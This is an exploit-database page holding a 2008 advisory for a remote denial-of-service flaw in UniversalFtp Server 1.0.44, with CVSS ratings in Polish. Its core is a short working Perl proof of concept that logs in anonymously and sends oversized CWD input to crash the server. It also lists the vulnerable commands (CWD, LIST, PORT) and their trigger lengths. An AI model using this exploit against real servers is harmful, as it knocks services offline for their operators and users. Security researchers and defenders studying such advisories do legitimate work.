UniversalFtp Server 1.0.44 Multiple Remote Denial of service

2008.12.15
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


Ogólna skala CVSS: 5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Brak
Wpływ na dostępność: Częściowy

# UniversalFtp Server 1.0.44 Multiple Remote #Denial of service # #@nolife : This bug has been found with a brain , ten fingers, a keyboard , and a laptop , one of my best Tool i ever tryed. Stay tuned for more tools hint . # # # Rponse: 226 Completed... # Statut: Liste du rpertoire complte # Commande : LIST aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...... ......... ........... # Rponse: 150 Directory... # Statut: ftpcontrolsocket.cpp(1764): Waiting for replies to skip before sending next command... caller=0p12e69f8 --> 0_o # #functions vuln : CWD (2 A) , LIST ( 4102 A) ,PORT (2 A) # # # PoC : use Net::FTP; (($target = $ARGV[0])) || die "usage:$0 <target> <port>"; my $user = "anonymous"; my $pass = "something"; print "Trying to connect to :$target...\n"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect"; print "Connected!\n"; $ftp->login($user, $pass); $ftp->cwd("AA"); print "Poc Successfull the server should down now \n"; $ftp->quit;

Referencje:

http://www.securityfocus.com/archive/1/archive/1/488142/100/200/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top